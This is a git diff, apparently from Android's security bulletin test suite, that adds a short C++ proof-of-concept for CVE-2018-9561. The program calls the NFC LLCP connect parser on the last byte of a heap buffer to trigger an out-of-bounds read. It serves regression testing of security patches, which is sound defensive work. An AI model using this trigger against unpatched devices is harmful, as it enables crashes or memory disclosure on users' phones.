diff options
Diffstat (limited to 'hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp')
-rw-r--r-- | hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp | 41 |
1 files changed, 41 insertions, 0 deletions
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp new file mode 100644 index 00000000000..6c4ccf2bc1c --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp @@ -0,0 +1,41 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include <string.h> +#include "llcp_api.h" + +#define DEFAULT_VALUE 0x06 +#define SIZE 16 +#define LENGTH 1 + +extern tLLCP_STATUS llcp_util_parse_connect(uint8_t* p_bytes, uint16_t length, + tLLCP_CONNECTION_PARAMS* p_params); + +int main() { + const int32_t offset = SIZE - LENGTH; + uint8_t* p_bytes = (uint8_t *)malloc(SIZE); + if (!p_bytes) { + return EXIT_FAILURE; + } + memset(p_bytes, DEFAULT_VALUE, SIZE); + + tLLCP_CONNECTION_PARAMS params; + llcp_util_parse_connect(&p_bytes[offset], LENGTH, ¶ms); + + free(p_bytes); + return EXIT_SUCCESS; +} |